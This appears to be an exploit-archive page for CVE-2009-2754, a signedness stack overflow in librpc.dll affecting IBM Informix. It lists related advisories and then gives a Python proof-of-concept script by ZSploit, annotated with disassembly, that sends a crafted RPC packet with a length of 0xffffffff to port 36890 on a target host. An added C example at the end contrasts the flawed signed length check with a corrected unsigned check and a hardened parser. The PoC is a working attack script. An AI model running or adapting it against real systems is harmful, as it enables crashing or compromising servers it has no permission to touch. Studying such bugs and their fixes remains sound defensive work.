| Title | Published | Views | Reporter |
|---|---|---|---|
| Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vuln | 8 Apr 2010 00:00 | – | zdt |
| CVE-2009-2754 | 8 Apr 2010 00:00 | – | circl |
| Preemptive Protection against Multiple Vendors librpc.dll Stack Buffer Overflow | 23 Apr 2010 00:00 | – | checkpoint_advisories |
| Multiple Vendors RPC librpc.dll Stack Buffer Overflow (CVE-2009-2754) | 17 May 2010 00:00 | – | checkpoint_advisories |
| Update Protection against Multiple Vendors librpc.dll Stack Buffer Overflow | 28 Feb 2011 00:00 | – | checkpoint_advisories |
| CVE-2009-2754 | 5 Mar 2010 16:00 | – | cve |
| CVE-2009-2754 | 5 Mar 2010 16:00 | – | cvelist |
| Multiple Vendor librpc.dll Signedness Error - Remote Code Execution | 8 Apr 2010 00:00 | – | exploitpack |
| CVE-2009-2754 | 5 Mar 2010 16:30 | – | nvd |
| librpc.dll Signedness Error Remote Code Execution | 9 Apr 2010 00:00 | – | packetstorm |

```python
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754
#! /usr/bin/env python
###############################################################################
## File : zs_ids_rpc.py
## Description:
## :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():
.text:1000B8E1 mov [ebp+0], eax
.text:1000B8E4 mov eax, [ebx]
.text:1000B8E6 push eax ; netlong
.text:1000B8E7 add ebx, 4
.text:1000B8EA call esi ; ntohl ; Get length of hostname
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1 jle short loc_1000B8FD
.text:1000B8F3 mov esi, 1
.text:1000B8F8 jmp loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD mov edi, [ebp+4]
.text:1000B900 mov ecx, eax
.text:1000B902 mov edx, ecx
.text:1000B904 mov esi, ebx
.text:1000B906 shr ecx, 2
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B mov ecx, edx
.text:1000B90D add eax, 3
.text:1000B910 and ecx, 3
.text:1000B913 rep movsb
"""
import sys
import socket

if (len(sys.argv) != 2):
    print "Usage:\t%s [target]" % sys.argv[0]
    sys.exit(0)

data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
       "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
       "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
       "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
       "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       "\x00\x00\x00\x00\x00\x00\x00\x00"

host = sys.argv[1]
port = 36890

print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.send(data)
        print "Sending payload .."
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"
```

The ZSploit Team
http://zsploit.com
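
The signedness error noted in the disassembly comments, as an added C example (not part of the original PoC and not the vendor's code): a signed comparison against 0FFh accepts a length of 0xffffffff, while an unsigned comparison combined with a check against the bytes actually received rejects it. The function names and the sample fields are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_NAME 255u /* the 0FFh limit from the disassembly */

/* Decode a 32-bit network-order value, as ntohl would on the wire bytes. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Flawed check: the length is treated as signed (cmp + jle), so
 * 0xffffffff is -1 and passes. Returns 1 if the length is accepted. */
int signed_check_accepts(uint32_t wire_len) {
    int32_t len = (int32_t)wire_len;
    return len <= (int32_t)MAX_NAME;
}

/* Corrected check: unsigned comparison rejects anything above 255. */
int unsigned_check_accepts(uint32_t wire_len) { return wire_len <= MAX_NAME; }

/* Hardened field parser (hypothetical helper): validates the length as
 * unsigned against both the limit and the bytes received before copying.
 * Returns the name length, or -1 for a malformed field. */
int parse_name(const uint8_t *field, size_t avail, char out[MAX_NAME + 1]) {
    if (avail < 4) return -1;
    uint32_t len = be32(field);
    if (len > MAX_NAME || len > avail - 4) return -1;
    memcpy(out, field + 4, len);
    out[len] = '\0';
    return (int)len;
}

int main(void) {
    /* Constructed sample fields: 4-byte length followed by name bytes. */
    const uint8_t bad[] = {0xff, 0xff, 0xff, 0xff, 'A', 'A', 'A', 'A'};
    const uint8_t good[] = {0, 0, 0, 4, 'h', 'o', 's', 't'};
    char name[MAX_NAME + 1];
    printf("signed check accepts 0xffffffff: %d\n", signed_check_accepts(be32(bad)));
    printf("unsigned check accepts 0xffffffff: %d\n", unsigned_check_accepts(be32(bad)));
    printf("parse_name(bad): %d\n", parse_name(bad, sizeof bad, name));
    printf("parse_name(good): %d\n", parse_name(good, sizeof good, name));
    return 0;
}
```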